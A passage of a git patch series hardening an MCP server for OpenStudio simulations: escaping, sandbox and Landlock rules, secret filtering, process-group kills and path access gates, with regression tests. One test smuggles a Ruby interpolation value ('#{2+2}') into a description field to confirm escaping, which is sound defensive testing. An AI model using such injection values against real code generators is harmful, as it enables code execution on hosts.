     injection. Raises ValueError otherwise (callers wrap in ok:false)."""
     if not isinstance(name, str) or not _ARG_NAME_RE.match(name):
-        raise ValueError(f"invalid argument name (must be an identifier): {name!r}")
+        raise ValueError(
+            "invalid argument name (must be a lowercase-leading identifier, "
+            f"matching [a-z_][a-zA-Z0-9_]*): {name!r}")
     return name
 
 
diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index 3b4bb24..3c25725 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -339,6 +339,10 @@ def _enforce_timeouts() -> None:
             if rec.status == "running" and rec.pid is not None
             and rec.started_at is not None
             and now - rec.started_at > SIM_TIMEOUT_SECONDS
+            # Skip a process that already exited but hasn't been reaped yet: let
+            # _dispatch_once()/_refresh_status() classify it by its real exit code
+            # instead of force-failing a run that may have completed successfully.
+            and _pid_alive(rec.pid)
         ]
     for rec in expired:
         with contextlib.suppress(psutil.NoSuchProcess, Exception):
diff --git a/tests/test_measure_authoring.py b/tests/test_measure_authoring.py
index b2606f7..b48ad4e 100644
--- a/tests/test_measure_authoring.py
+++ b/tests/test_measure_authoring.py
@@ -1148,3 +1148,58 @@ async def _run():
                 # Should still include measure_dir for debugging
                 assert "measure_dir" in res
     asyncio.run(_run())
+
+
+@pytest.mark.integration
+def test_ruby_description_interpolation_neutralized():
+    # Regression: a measure description was emitted into a Ruby double-quoted
+    # literal WITHOUT escaping '#', so '#{...}' was live interpolation. When
+    # `openstudio measure -u` (run unsandboxed, as root) evaluated description(),
+    # the payload executed = RCE. _escape_ruby_str must escape '#' -> '\#'.
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    from pathlib import Path
+
+    payload = "harmless pwn#{2+2} tail"
+
+    async def _run():
+        async with stdio_client(server_params()) as (r, w):
+            async with ClientSession(r, w) as s:
+                await s.initialize()
+                name = _unique("rb_inject")
+                res = unwrap(await s.call_tool("create_measure", {
+                    "name": name,
+                    "description": payload,
+                    "run_body": RUBY_BODY,
+                    "language": "Ruby",
+                }))
+                assert res["ok"] is True, res
+                rb = Path(res["measure_dir"], "measure.rb").read_text(encoding="utf-8")
+                # The escaped form must be present and the live-interpolation form absent.
+                assert "pwn\\#{2+2}" in rb, f"description '#' not escaped:\n{rb}"
+                assert "pwn#{2+2}" not in rb, f"live Ruby interpolation survived:\n{rb}"
+    asyncio.run(_run())
+
+
+@pytest.mark.integration
+def test_uppercase_arg_name_rejected():
+    # Regression: an uppercase-leading arg name became a bare Ruby local `Foo = ...`,
+    # which Ruby parses as dynamic constant assignment (SyntaxError) inside a method,
+    # breaking the generated measure. _ARG_NAME_RE must reject uppercase-leading names.
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+
+    async def _run():
+        async with stdio_client(server_params()) as (r, w):
+            async with ClientSession(r, w) as s:
+                await s.initialize()
+                res = unwrap(await s.call_tool("create_measure", {
+                    "name": _unique("up_arg"),
+                    "description": "uppercase arg name",
+                    "run_body": RUBY_BODY,
+                    "language": "Ruby",
+                    "arguments": [{"name": "BadName", "type": "String", "required": False}],
+                }))
+                assert res["ok"] is False, f"uppercase arg name must be rejected: {res}"
+                assert "argument name" in res.get("error", "").lower(), res
+    asyncio.run(_run())
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
index d97591c..3701923 100644
--- a/tests/test_sandbox.py
+++ b/tests/test_sandbox.py
@@ -732,3 +732,44 @@ async def _run():
         f"H5: measure must NOT run as root with OSMCP_SANDBOX_UID=0; info=\n{info}"
     assert "PROBE uid=1001" in info, \
         f"H5: sandbox uid must clamp to the safe default 1001; info=\n{info}"
+
+
+def test_unknown_sandbox_mode_fails_closed():
+    # Regression: a typo'd OSMCP_SANDBOX (e.g. 'atuo') left enabled()=True but
+    # _full()=False, silently downgrading the default Landlock+seccomp tier to
+    # posix-only. An unknown value must normalize to 'auto' (fail-closed).
+    from mcp_server import config
+    assert config._normalize_sandbox_mode("atuo") == "auto"
+    assert config._normalize_sandbox_mode("landlok") == "auto"
+    assert config._normalize_sandbox_mode("AUTO") == "auto"
+    assert config._normalize_sandbox_mode(" posix ") == "posix"
+    assert config._normalize_sandbox_mode("off") == "off"
+    assert config._normalize_sandbox_mode("") == ""  # explicit off-alias, honored
+
+
+def test_safe_float_rejects_non_finite():
+    # Regression: a NaN/inf SIM_TIMEOUT made both `<= 0` and the elapsed-time
+    # comparison false, silently disabling wall-clock timeout enforcement.
+    from mcp_server import config
+    assert config._safe_float("nan", 7200.0) == 7200.0
+    assert config._safe_float("inf", 7200.0) == 7200.0
+    assert config._safe_float("-inf", 7200.0) == 7200.0
+    assert config._safe_float("bad", 7200.0) == 7200.0
+    assert config._safe_float("3.5", 7200.0) == pytest.approx(3.5)
+
+
+def test_build_env_drops_lc_prefixed_secret(monkeypatch, tmp_path):
+    # Regression: a bare 'LC_' allowlist prefix copied any LC_*-named host var
+    # (e.g. LC_API_TOKEN) into untrusted measure code. Only standard locale
+    # categories may pass; arbitrary names — even LC_-prefixed — are dropped.
+    from mcp_server import sandbox
+    monkeypatch.setattr(sandbox, "SANDBOX_MODE", "posix")  # force enabled() + filtering
+    monkeypatch.setenv("LC_CTYPE", "en_US.UTF-8")
+    monkeypatch.setenv("LC_API_TOKEN", "supersecret")
+    monkeypatch.setenv("MY_SECRET", "nope")
+    monkeypatch.setenv("PATH", "/usr/bin")
+    env = sandbox.build_env(tmp_path, redirect_tmp=False)
+    assert env.get("LC_CTYPE") == "en_US.UTF-8", "standard locale var must pass"
+    assert "LC_API_TOKEN" not in env, "LC_-prefixed secret must be dropped"
+    assert "MY_SECRET" not in env, "non-allowlisted secret must be dropped"
+    assert env.get("PATH") == "/usr/bin", "PATH is required and allowlisted"
diff --git a/tests/test_sim_queue.py b/tests/test_sim_queue.py
index 2227288..74343ef 100644
--- a/tests/test_sim_queue.py
+++ b/tests/test_sim_queue.py
@@ -161,3 +161,28 @@ async def _run():
                     await asyncio.sleep(0.3)
 
         asyncio.run(_run())
+
+
+@pytest.mark.integration
+def test_enforce_timeouts_skips_dead_pid(monkeypatch):
+    # Regression: _enforce_timeouts marked a finished-but-unreaped run as 'failed'
+    # without checking _pid_alive, clobbering a possibly-successful result. A run
+    # whose process already exited must be left for the reaper to classify by exit
+    # code, not force-failed by the timeout enforcer.
+    import time
+
+    from mcp_server.skills.simulation import operations as ops
+
+    monkeypatch.setattr(ops, "SIM_TIMEOUT_SECONDS", 1.0)
+    started = time.time() - 10_000  # well past the 1s cap
+    rec = ops.RunRecord(
+        run_id="t_dead_pid", user_key="u", name="n", status="running",
+        created_at=started, started_at=started, ended_at=None,
+        pid=2_000_000_000,  # bogus pid -> _pid_alive() is False (no such process)
+        run_dir=Path("/runs/none"), osw_path=Path("/runs/none/in.osw"),
+        epw_path=None, exit_code=None, error=None,
+    )
+    monkeypatch.setitem(ops._RUNS, rec.run_id, rec)
+    ops._enforce_timeouts()
+    assert ops._RUNS[rec.run_id].status == "running", \
+        "dead-but-unreaped run was force-failed instead of left for the reaper"

From 3f942b233b6c09f19e58482d1ac72dd570a20e50 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 21:11:52 -0400
Subject: [PATCH 21/26] =?UTF-8?q?fix(security):=20batch=202=20=E2=80=94=20?=
 =?UTF-8?q?per-file=20/dev=20Landlock=20rules=20+=20process-group=20kill?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Codex gpt-5.5 review fixes (medium):
- #4: replace the whole-/dev rw Landlock grant with per-file rules — /dev/null,
  /dev/zero (rw) and /dev/urandom, /dev/random (ro). A /dev dir grant also exposed
  writable /dev/shm + /dev/mqueue (shared storage/IPC outside the run dir) and
  permitted mknod. _landlock._add now masks a rule on a non-directory to file-only
  rights (a dir-only bit on a file makes add_rule return EINVAL -> fail-closed).
- #8: sims launch with start_new_session=True (own process-group leader) and
  timeout/cancel now kill the whole group via _kill_process_group(), reaping forked
  children (EnergyPlus, helpers) a single-pid kill would orphan. Only ever signals a
  group we created (pgid == pid) — never the server's own group.

Tests: red-green verified (both fail on unfixed source, pass with fix). 2 added
(test_sandbox.py wrap_cmd device rules, test_sim_queue.py group kill). Full
test_sandbox + test_sim_queue + test_measures green under OSMCP_SANDBOX=auto.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/_landlock.py                    | 12 +++-
 mcp_server/sandbox.py                      | 17 ++++--
 mcp_server/skills/simulation/operations.py | 65 ++++++++++++++++------
 tests/test_sandbox.py                      | 17 ++++++
 tests/test_sim_queue.py                    | 33 +++++++++++
 5 files changed, 121 insertions(+), 23 deletions(-)

diff --git a/mcp_server/_landlock.py b/mcp_server/_landlock.py
index 7d0a784..ae1fcfd 100644
--- a/mcp_server/_landlock.py
+++ b/mcp_server/_landlock.py
@@ -12,6 +12,7 @@
 
 import ctypes
 import os
+import stat
 
 # Generic syscall table numbers (identical on x86_64 and aarch64).
 _NR_CREATE_RULESET = 444
@@ -45,6 +46,10 @@
     | _A_REMOVE_DIR | _A_REMOVE_FILE | _A_MAKE_CHAR | _A_MAKE_DIR | _A_MAKE_REG
     | _A_MAKE_SOCK | _A_MAKE_FIFO | _A_MAKE_BLOCK | _A_MAKE_SYM
 )
+# Rights that are meaningful on a non-directory. Landlock's add_rule returns
+# EINVAL if a rule on a FILE carries directory-only rights (READ_DIR, MAKE_*,
+# REMOVE_*), so a per-file rule (e.g. /dev/null) MUST be masked to these.
+_FILE_ONLY = _A_EXECUTE | _A_WRITE_FILE | _A_READ_FILE | _A_TRUNCATE | _A_IOCTL_DEV
 
 
 class _RulesetAttr(ctypes.Structure):
@@ -97,7 +102,12 @@ def _add(path: str, access: int) -> bool:
         except OSError:
             return True  # absent path — optional, not a failure
         try:
-            pba = _PathBeneathAttr(allowed_access=access & handled, parent_fd=fd)
+            acc = access & handled
+            # A rule on a non-directory (e.g. /dev/null) must carry only file
+            # rights — dir-only bits make add_rule fail with EINVAL.
+            if not stat.S_ISDIR(os.fstat(fd).st_mode):
+                acc &= _FILE_ONLY
+            pba = _PathBeneathAttr(allowed_access=acc, parent_fd=fd)
             return libc.syscall(_NR_ADD_RULE, rs_fd, _RULE_PATH_BENEATH, ctypes.byref(pba), 0) == 0
         finally:
             os.close(fd)
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 335ff5e..e4b11d0 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -52,6 +52,14 @@
 _RO_SYSTEM = ("/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc",
               "/opt/venv", "/usr/local", "/var/oscli", "/proc", "/sys")
 
+# Specific device files the confined process needs — granted individually instead
+# of the whole /dev directory. A `/dev` rw grant also exposes writable /dev/shm and
+# /dev/mqueue (shared storage / IPC outside the run dir) and permits mknod. These
+# are file-level Landlock rules, so only the file-access bits apply — no directory
+# powers. Read-write: the bit-bucket + zero source; read-only: the entropy sources.
+_DEV_RW = ("/dev/null", "/dev/zero")
+_DEV_RO = ("/dev/urandom", "/dev/random")
+
 _warned_no_backend = False  # one-shot log when no kernel backend (non-Linux)
 
 # Environment the OpenStudio CLI / bundler / EnergyPlus / measure code legitimately
@@ -188,11 +196,12 @@ def wrap_cmd(cmd: list[str], work_dir: Path | str,
         if value and value > 0:
             wrapped += [flag, str(value)]
     if _full():
-        for path in _ro_paths():
+        for path in (*_ro_paths(), *_DEV_RO):
             wrapped += ["--landlock-ro", path]
-        # rw: the run dir (+ caller extras), plus /dev for /dev/null & /dev/urandom
-        # (node creation there is still barred by DAC for the unprivileged uid).
-        for path in (str(work_dir), "/dev", *extra_rw):
+        # rw: the run dir (+ caller extras) + the writable device FILES only — NOT
+        # the whole /dev dir (which would also expose writable /dev/shm, /dev/mqueue
+        # and permit mknod). See _DEV_RW / _DEV_RO above.
+        for path in (str(work_dir), *_DEV_RW, *extra_rw):
             wrapped += ["--landlock-rw", path]
         # Network deny is the default; OSMCP_SANDBOX_NET=allow opts out (trusted
         # deployments that legitimately fetch e.g. BCL components).
diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index 3c25725..fdf0b85 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -3,7 +3,9 @@
 
 import contextlib
 import json
+import os
 import shutil
+import signal
 import subprocess
 import tempfile
 import threading
@@ -253,6 +255,37 @@ def _pid_alive(pid: int) -> bool:
         return False
 
 
+def _kill_process_group(pid: int, *, grace: float = 5.0) -> None:
+    """Terminate the run's whole process group (SIGTERM, then SIGKILL after grace).
+
+    Sims launch with start_new_session=True, so the child is its own group leader
+    (pgid == pid); killing the group reaps forked children (EnergyPlus, ruby
+    helpers) that a single-pid kill would orphan. We only signal a group we created
+    (pgid == pid) — never the server's own group. Falls back to a single-pid kill
+    when the group can't be resolved or on non-POSIX (no os.killpg).
+    """
+    pgid = None
+    if hasattr(os, "getpgid") and hasattr(os, "killpg"):
+        with contextlib.suppress(ProcessLookupError, PermissionError, OSError):
+            pgid = os.getpgid(pid)
+    if pgid is not None and pgid == pid:
+        with contextlib.suppress(ProcessLookupError, PermissionError, OSError):
+            os.killpg(pgid, signal.SIGTERM)
+        with contextlib.suppress(psutil.NoSuchProcess, psutil.TimeoutExpired):
+            psutil.Process(pid).wait(timeout=grace)
+        with contextlib.suppress(ProcessLookupError, PermissionError, OSError):
+            os.killpg(pgid, signal.SIGKILL)  # ESRCH if the group already exited
+        return
+    # Fallback: pgid unavailable / not a leader / non-POSIX — single-pid kill.
+    with contextlib.suppress(psutil.NoSuchProcess, Exception):
+        p = psutil.Process(pid)
+        p.terminate()
+        try:
+            p.wait(timeout=grace)
+        except psutil.TimeoutExpired:
+            p.kill()
+
+
 def _build_run_cmd(osw_path: Path) -> list[str]:
     """openstudio CLI command to run a staged OSW (with bundle flags)."""
     return [
@@ -277,6 +310,11 @@ def _launch(rec: RunRecord) -> None:
         stdout=log.open("w", encoding="utf-8"),
         stderr=subprocess.STDOUT,
         env=run_env,
+        # New session => the child is its own process-group leader (pgid == pid),
+        # so a timeout/cancel can kill the WHOLE group (EnergyPlus + any forked
+        # helpers) without ever signalling the server's own group. See
+        # _kill_process_group(). No-op on non-POSIX.
+        start_new_session=True,
     )
     rec.pid = proc.pid
     rec.status = "running"
@@ -345,13 +383,7 @@ def _enforce_timeouts() -> None:
             and _pid_alive(rec.pid)
         ]
     for rec in expired:
-        with contextlib.suppress(psutil.NoSuchProcess, Exception):
-            p = psutil.Process(rec.pid)
-            p.terminate()
-            try:
-                p.wait(timeout=5)
-            except psutil.TimeoutExpired:
-                p.kill()
+        _kill_process_group(rec.pid)  # whole group: EnergyPlus + any forked helpers
         with _sim_lock:
             rec.status = "failed"
             rec.ended_at = _now()
@@ -699,13 +731,15 @@ def cancel_run(run_id: str) -> dict[str, Any]:
         audit("sim_cancelled", run_id=run_id, user=rec.user_key)
         return {"ok": True, "run_id": run_id, "cancelled": True}
 
+    if not _pid_alive(pid):
+        # Finished before the cancel landed — classify by exit code, don't mislabel
+        # a completed run as cancelled.
+        with _sim_lock:
+            rec = _refresh_status(rec)
+            _RUNS[run_id] = rec
+        return {"ok": True, "run_id": run_id, "cancelled": False, "status": rec.status}
     try:
-        p = psutil.Process(pid)
-        p.terminate()
-        try:
-            p.wait(timeout=5)
-        except psutil.TimeoutExpired:
-            p.kill()
+        _kill_process_group(pid)  # whole group (EnergyPlus + helpers), not just the leader
         with _sim_lock:
             rec.status = "cancelled"
             rec.ended_at = rec.ended_at or _now()
@@ -713,11 +747,6 @@ def cancel_run(run_id: str) -> dict[str, Any]:
         _persist_run_record(rec)  # disk record must read 'cancelled' so GC can reclaim it
         audit("sim_cancelled", run_id=run_id, user=rec.user_key)
         return {"ok": True, "run_id": run_id, "cancelled": True}
-    except psutil.NoSuchProcess:
-        with _sim_lock:
-            rec = _refresh_status(rec)
-            _RUNS[run_id] = rec
-        return {"ok": True, "run_id": run_id, "cancelled": False, "status": rec.status}
     except Exception as e:
         return {"ok": False, "run_id": run_id, "error": str(e)}
 
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
index 3701923..24ebcac 100644
--- a/tests/test_sandbox.py
+++ b/tests/test_sandbox.py
@@ -773,3 +773,20 @@ def test_build_env_drops_lc_prefixed_secret(monkeypatch, tmp_path):
     assert "LC_API_TOKEN" not in env, "LC_-prefixed secret must be dropped"
     assert "MY_SECRET" not in env, "non-allowlisted secret must be dropped"
     assert env.get("PATH") == "/usr/bin", "PATH is required and allowlisted"
+
+
+def test_wrap_cmd_grants_device_files_not_whole_dev(monkeypatch, tmp_path):
+    # Regression: granting /dev rw also exposed writable /dev/shm + /dev/mqueue
+    # (shared storage/IPC outside the run dir) and permitted mknod. Confine to the
+    # specific device FILES instead (file-level Landlock rules).
+    from mcp_server import sandbox
+    monkeypatch.setattr(sandbox, "SANDBOX_MODE", "auto")   # full tier
+    monkeypatch.setattr(sandbox, "SANDBOX_NET", "deny")
+    monkeypatch.setattr(sandbox, "_has_backend", lambda: True)
+    wrapped = sandbox.wrap_cmd(["echo", "hi"], tmp_path)
+    rw = [wrapped[i + 1] for i, a in enumerate(wrapped) if a == "--landlock-rw"]
+    ro = [wrapped[i + 1] for i, a in enumerate(wrapped) if a == "--landlock-ro"]
+    assert "/dev" not in rw, f"must not grant the whole /dev dir rw: {rw}"
+    assert "/dev/null" in rw and "/dev/zero" in rw, f"missing rw device files: {rw}"
+    assert "/dev/urandom" in ro and "/dev/random" in ro, f"missing ro device files: {ro}"
+    assert "/dev/shm" not in rw and "/dev/shm" not in ro, "/dev/shm must never be granted"  # noqa: S108
diff --git a/tests/test_sim_queue.py b/tests/test_sim_queue.py
index 74343ef..7cc93e2 100644
--- a/tests/test_sim_queue.py
+++ b/tests/test_sim_queue.py
@@ -186,3 +186,36 @@ def test_enforce_timeouts_skips_dead_pid(monkeypatch):
     ops._enforce_timeouts()
     assert ops._RUNS[rec.run_id].status == "running", \
         "dead-but-unreaped run was force-failed instead of left for the reaper"
+
+
+@pytest.mark.integration
+def test_kill_process_group_terminates_session_leader():
+    # Regression: timeout/cancel killed only the leader pid, orphaning forked
+    # children (EnergyPlus). Runs now launch in their own session (start_new_session)
+    # and _kill_process_group signals the whole group; the kernel delivers killpg to
+    # every group member, so verifying the new-session leader dies via the group path
+    # is sufficient (and never touches the server's own group).
+    import contextlib as _ctx
+    import os
+    import subprocess
+    import time
+
+    import psutil
+
+    from mcp_server.skills.simulation import operations as ops
+
+    if not hasattr(os, "getpgid"):
+        pytest.skip("POSIX process groups not available")
+    p = subprocess.Popen(["sleep", "60"], start_new_session=True)  # noqa: S607
+    try:
+        assert os.getpgid(p.pid) == p.pid, "start_new_session should make pid the group leader"
+        ops._kill_process_group(p.pid)  # SIGTERMs the group and reaps the leader
+        deadline = time.time() + 5
+        while psutil.pid_exists(p.pid) and time.time() < deadline:
+            time.sleep(0.1)
+        assert not psutil.pid_exists(p.pid), "session-leader survived group kill"
+    finally:
+        with _ctx.suppress(Exception):
+            p.kill()
+        with _ctx.suppress(Exception):
+            p.wait(timeout=2)

From ab0d4b8f3b22f01f226158f7b9162657d9e10e6e Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 21:49:10 -0400
Subject: [PATCH 22/26] =?UTF-8?q?fix(security):=20batch=203=20=E2=80=94=20?=
 =?UTF-8?q?run=5Fosw=20access=20gate,=20test=5Fmeasure=20private=20staging?=
 =?UTF-8?q?,=20drop=20/inputs=20RO?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Codex gpt-5.5 review fixes (the staging/policy refactors):
- #2 (critical, cross-tenant read): the PUBLIC run_osw now is_path_allowed-gates the
  OSW (and EPW) BEFORE reading/copying — it copies the OSW's whole parent dir into the
  run dir, so an un-gated path let a client read another tenant's run or host files
  (e.g. run_osw(/runs/<other>/<id>/in.osw)). A keyword-only _internal=True (not exposed
  via MCP) is the trusted path for run_simulation, whose temp OSW is server-built and
  whose inputs it already validated.
- #3 (high, shared-content mutation): test_measure copied test_model.osm into, chowned,
  and Landlock-granted the caller's measure dir. For a measure under a shared read-only
  root (e.g. a bundled measure) that corrupted shared content. Now: measures outside the
  caller's own writable run root are copied into a private run dir and tested there;
  own-root measures still test in place (xml update persists). Private copy is cleaned up.
- #5 (high, cross-tenant read): drop INPUT_ROOT (/inputs) from the Landlock RO allowlist
  — it's shared/multi-tenant and inputs are staged into the run dir anyway. Documented
  the DAC rationale for keeping /etc,/proc,/sys (uid-1001 already blocks secret reads).

Tests: red-green verified per fix (each fails on unfixed source). run_osw gate +
internal-path (test_path_safety), test_measure-no-shared-mutation + /inputs-not-RO
(test_sandbox). 107 passed across path_safety/sandbox/measures/measure_authoring/
sim_queue under OSMCP_SANDBOX=auto.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/sandbox.py                         | 14 ++++-
 .../skills/measure_authoring/operations.py    | 14 +++++
 mcp_server/skills/simulation/operations.py    | 28 ++++++---
 tests/test_path_safety.py                     | 61 ++++++++++++++++++-
 tests/test_sandbox.py                         | 47 ++++++++++++++
 5 files changed, 153 insertions(+), 11 deletions(-)

diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index e4b11d0..1f8a61d 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -31,7 +31,6 @@
 from mcp_server.config import (
     COMMON_MEASURES_DIR,
     COMSTOCK_MEASURES_DIR,
-    INPUT_ROOT,
     SANDBOX_GID,
     SANDBOX_MODE,
     SANDBOX_NET,
@@ -116,11 +115,22 @@ def _ro_paths() -> list[str]:
     /repo is deliberately NOT granted: the measure runs from the copied run dir,
     and the shim imports mcp_server before applying Landlock — so the run never
     needs to read the source tree (which could hold a host .env).
+
+    INPUT_ROOT (/inputs) is deliberately NOT granted either: it is a SHARED,
+    multi-tenant dir, so granting it would let one tenant's confined measure read
+    another's inputs. Inputs are staged into the run dir before execution, so the
+    confined process reads the staged copy, never /inputs directly.
+
+    The broad system roots (/etc, /proc, /sys) are intentional and DAC-mitigated:
+    OpenStudio/Ruby/EnergyPlus need bits of each (certs, nsswitch, /proc/self,
+    cpuinfo), and the uid-1001 drop means the kernel already blocks reads of
+    non-world-readable secrets (/etc/shadow) and other users' /proc/<pid>/environ.
+    Landlock here is defense-in-depth on top of DAC, not the only barrier.
     """
     return [
         *_RO_SYSTEM,
         str(COMSTOCK_MEASURES_DIR), str(COMMON_MEASURES_DIR),
-        str(INPUT_ROOT), str(SKILLS_DIR),
+        str(SKILLS_DIR),
     ]
 
 
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index 3ef1067..a48d217 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -1007,6 +1007,7 @@ def test_measure_op(
     3. SystemD_baseline.osm from tests/assets or /inputs
     4. No test_model.osm → test template falls back to empty Model.new()
     """
+    _private_copy: Path | None = None
     try:
         mdir = Path(measure_dir)
         if not mdir.is_dir():
@@ -1020,6 +1021,16 @@ def test_measure_op(
         if err:
             return {"ok": False, "error": err}
 
+        # If the measure isn't in the caller's OWN writable area (e.g. a bundled or
+        # otherwise shared read-only measure), copy it into a private run dir and test
+        # the copy. test_measure writes test_model.osm + chowns + Landlock-grants the
+        # dir, so it must never mutate shared/host content. Own-run-root measures are
+        # tested in place (the caller's to mutate; the measure.xml update persists).
+        if not is_path_allowed(mdir, write=True):
+            _private_copy = Path(tempfile.mkdtemp(prefix="measure_test_", dir=user_run_root()))
+            shutil.copytree(mdir, _private_copy, symlinks=True, dirs_exist_ok=True)
+            mdir = _private_copy
+
         # Detect language
         if (mdir / "measure.py").is_file():
             language = "Python"
@@ -1130,6 +1141,9 @@ def test_measure_op(
         return {"ok": False, "error": "Test run timed out (60s)"}
     except Exception as e:
         return {"ok": False, "error": f"Failed to test measure: {e}"}
+    finally:
+        if _private_copy is not None:
+            shutil.rmtree(_private_copy, ignore_errors=True)
 
 
 def edit_measure_op(
diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index fdf0b85..d8b537f 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -420,7 +420,8 @@ def _enqueue(run_id: str) -> None:
         _queue.append(run_id)
 
 
-def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None) -> dict[str, Any]:
+def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None,
+            *, _internal: bool = False) -> dict[str, Any]:
     """
     Stage the OSW + referenced files into /runs/<run_id>/ and execute:
       openstudio run -w <staged_osw>
@@ -429,14 +430,25 @@ def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None)
       - We always validate the OSW JSON and its seed_file reference (if any).
       - If no EPW override is provided, we also require the OSW's weather_file (if set) to exist.
       - If an EPW override is provided, we allow a missing OSW weather_file because it will be replaced.
+
+    Access control: as a PUBLIC tool, run_osw copies the OSW's whole parent dir into
+    the run dir — so an un-gated path discloses arbitrary host / other-tenant files.
+    Public callers must pass an OSW (and EPW) under their own run root or a shared
+    read root (is_path_allowed). `_internal=True` is the trusted path for
+    run_simulation, whose server-built temp OSW lives in a private staging dir and
+    whose inputs it has already validated; it is NOT exposed via the MCP tool.
     """
     src_osw = Path(osw_path).resolve()
     if not src_osw.exists():
         return {"ok": False, "error": f"OSW not found: {osw_path}"}
-    # An OSW bundle may legitimately live anywhere (e.g. a temp staging dir), so we
-    # don't is_path_allowed the OSW path itself — but we must never FOLLOW a symlink
-    # in its tree that escapes the bundle (would copy a host file into the run dir).
-    # User-facing entry points (run_simulation) validate their inputs separately.
+    if not _internal:
+        # Gate BEFORE reading/validating/copying anything from the path.
+        if not is_path_allowed(src_osw):
+            return {"ok": False, "error": f"OSW path not allowed: {osw_path}"}
+        if epw_path and not is_path_allowed(Path(epw_path)):
+            return {"ok": False, "error": f"EPW path not allowed: {epw_path}"}
+    # We must never FOLLOW a symlink in the OSW's tree that escapes the bundle
+    # (would copy a host file into the run dir), even for the trusted internal path.
     sym_err = reject_escaping_symlinks(src_osw.parent)
     if sym_err:
         return {"ok": False, "error": sym_err}
@@ -858,5 +870,7 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None
         osw_path_out = stage / "workflow.osw"
         osw_path_out.write_text(json.dumps(osw, indent=2), encoding="utf-8")
 
-        # Delegate to run_osw — pass epw_path so it handles staging into files/
-        return run_osw(osw_path=str(osw_path_out), epw_path=epw_abs, name=name)
\ No newline at end of file
+        # Delegate to run_osw — pass epw_path so it handles staging into files/.
+        # _internal=True: osm + epw are already is_path_allowed above and the temp
+        # OSW is server-built in a private staging dir (not a caller-supplied path).
+        return run_osw(osw_path=str(osw_path_out), epw_path=epw_abs, name=name, _internal=True)
\ No newline at end of file
diff --git a/tests/test_path_safety.py b/tests/test_path_safety.py
index 32d6d2a..16aa24d 100644
--- a/tests/test_path_safety.py
+++ b/tests/test_path_safety.py
@@ -72,7 +72,7 @@ def kill(self):
 
         monkeypatch.setattr(_subprocess, "Popen", _FakePopen)
 
-        result = run_osw(str(osw_path))
+        result = run_osw(str(osw_path), _internal=True)  # exercise staging/flatten, not the access gate
         # Staging happens before subprocess — verify unconditionally
         assert "escapes" not in result.get("error", ""), f"Path traversal error: {result}"
         run_dirs = list(run_root.iterdir())
@@ -122,7 +122,7 @@ def kill(self):
 
         monkeypatch.setattr(_subprocess, "Popen", _FakePopen)
 
-        result = run_osw(str(osw_path))
+        result = run_osw(str(osw_path), _internal=True)  # exercise staging/flatten, not the access gate
         # Staging happens before subprocess — verify unconditionally
         assert "escapes" not in result.get("error", ""), "Normal seed incorrectly rejected"
         run_dirs = list(run_root.iterdir())
@@ -461,3 +461,60 @@ def test_bad_end_month(self):
         result = set_run_period(begin_month=1, begin_day=1, end_month=13, end_day=31)
         assert result["ok"] is False
         assert "end_month" in result["error"]
+
+
+class TestRunOswAccessControl:
+    """#2 (Codex): the PUBLIC run_osw must reject an OSW outside the caller's
+    allowed roots — it copies the OSW's whole parent dir into the run dir, so an
+    un-gated path is a cross-tenant / host file-disclosure vector."""
+
+    def _stub(self, monkeypatch, run_root):
+        monkeypatch.setattr(
+            "mcp_server.skills.simulation.operations.user_run_root", lambda: run_root)
+        monkeypatch.setattr(
+            "mcp_server.skills.simulation.operations._ensure_dispatcher", lambda: None)
+
+    def test_out_of_policy_osw_rejected(self, tmp_path, monkeypatch):
+        # Regression: run_osw skipped is_path_allowed and _copy_tree'd the OSW's whole
+        # parent dir into the run dir, disclosing arbitrary host / other-tenant files.
+        outside = tmp_path / "other_tenant"
+        outside.mkdir()
+        (outside / "secret.osm").write_text("another tenant's model")
+        (outside / "workflow.osw").write_text(json.dumps({"seed_file": "secret.osm"}))
+        run_root = tmp_path / "runs"
+        run_root.mkdir()
+        self._stub(monkeypatch, run_root)
+
+        from mcp_server.skills.simulation.operations import run_osw
+        result = run_osw(str(outside / "workflow.osw"))  # public call (no _internal)
+        assert result["ok"] is False, f"out-of-policy OSW must be rejected: {result}"
+        assert "not allowed" in result.get("error", "").lower(), result
+        assert list(run_root.iterdir()) == [], "nothing may be staged from a rejected path"
+
+    def test_internal_trusted_path_still_stages(self, tmp_path, monkeypatch):
+        # Validates: the internal staging path (run_simulation's server-built temp OSW)
+        # still works via _internal=True, even from a dir outside the allowed roots.
+        stage = tmp_path / "stage"
+        stage.mkdir()
+        (stage / "model.osm").write_text("seed")
